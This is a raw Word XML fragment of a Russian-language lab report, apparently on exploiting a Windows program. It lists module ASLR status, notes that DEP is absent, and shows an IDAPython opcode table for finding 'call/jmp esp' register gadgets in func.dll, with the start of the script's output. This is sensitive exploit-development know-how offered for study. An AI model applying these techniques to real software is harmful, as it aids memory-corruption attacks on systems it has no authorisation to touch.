      <w:r w:rsidR="00CA1C8D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR=True)</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC5527B" w14:textId="5BF82BB8" w:rsidR="00CA1C8D" w:rsidRDefault="00D735BC" w:rsidP="00CA1C8D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D735BC">
        <w:t xml:space="preserve">msvcrt.dll </w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR=True)</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA2149" w14:textId="491B63C2" w:rsidR="00CA1C8D" w:rsidRDefault="004557B6" w:rsidP="00CA1C8D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="004557B6">
        <w:t xml:space="preserve">ntdll.dll </w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR=True)</w:t>
      </w:r>
      <w:r w:rsidR="00CA1C8D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A375FC" w14:textId="181B50EE" w:rsidR="00787408" w:rsidRDefault="00787408" w:rsidP="00CA1C8D">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787408">
        <w:t>func.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR=False).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863EFF1" w14:textId="77777777" w:rsidR="00272818" w:rsidRPr="007A6BFC" w:rsidRDefault="00272818" w:rsidP="008367F1"/>
    <w:p w14:paraId="5CA9937F" w14:textId="4E5E7281" w:rsidR="00F038DE" w:rsidRDefault="006A648D" w:rsidP="00F038DE">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработка скрипта для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="006A648D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401C970E" w14:textId="0AC428D7" w:rsidR="00817712" w:rsidRPr="0070024E" w:rsidRDefault="00817712" w:rsidP="00817712">
      <w:r>
        <w:t xml:space="preserve">Так как основной исполняемый файл не является системным, в нем по умолчанию не включена защита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что позволяет помещать на стек команды и затем выполнять их. Для поиска </w:t>
      </w:r>
      <w:r w:rsidR="001C731B">
        <w:t>инструкций</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с известными адресами в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00817712">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00817712">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">был реализован скрипт </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPython</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, который находит </w:t>
      </w:r>
      <w:r w:rsidR="0070024E">
        <w:t>инструкции вызовов стека</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7FE290" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>OPCODES = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37236516" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xd4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63E9CE5D" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>    "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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>":  b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xe4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> 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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B9EA9AB" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xd0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30DFBD78" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>    "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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>":  b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xe0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> 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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12746EDA" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xd3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17CD54E6" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>    "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bx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>":  b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xe3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> 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bx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B3EBBC5" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xd1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70B64197" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>    "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cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>":  b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xe1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> 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cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AFF3392" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xd2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B6A294D" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>    "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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>":  b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xe2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> 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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42BF50D4" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xd7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="408CB766" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>    "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di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>":  b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xe7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> 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di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71648A7C" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xd6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3921AD5C" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>    "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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>":  b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>\xe6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4308">
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C047511" w14:textId="77777777" w:rsidR="00AD4308" w:rsidRPr="00AD4308" w:rsidRDefault="00AD4308" w:rsidP="00AD4308">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4308">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A2D4AA" w14:textId="3026433F" w:rsidR="00AD4308" w:rsidRPr="00AB4905" w:rsidRDefault="00DD648F" w:rsidP="00751EAF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Результат</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4905">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>работы</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4905">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>скрипта</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4905">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318151B" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>---------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE84B3" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Python 3.9.0 (tags/v3.9.0:9cf6752, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Oct  5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> 2020, 15:34:40) [MSC v.1927 64 bit (AMD64)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0265A358" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>IDAPython</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> v7.4.0 final (serial 0) (c) The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>IDAPython</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> Team &lt;idapython@googlegroups.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038120E" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>---------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52196792" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Using FLIRT signature: GCC (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>mingw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>cygwin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>) v3.4 runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A73DA2" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Propagating type information...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F4316A" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Function argument information has been propagated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001886E1" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FB1145" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">The initial </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>autoanalysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> has been finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D2725E" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757A2948" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>FOUND INSTRUCTIONS (JMP/CALL REGISTER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8EA4A4" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>____________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F2095" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
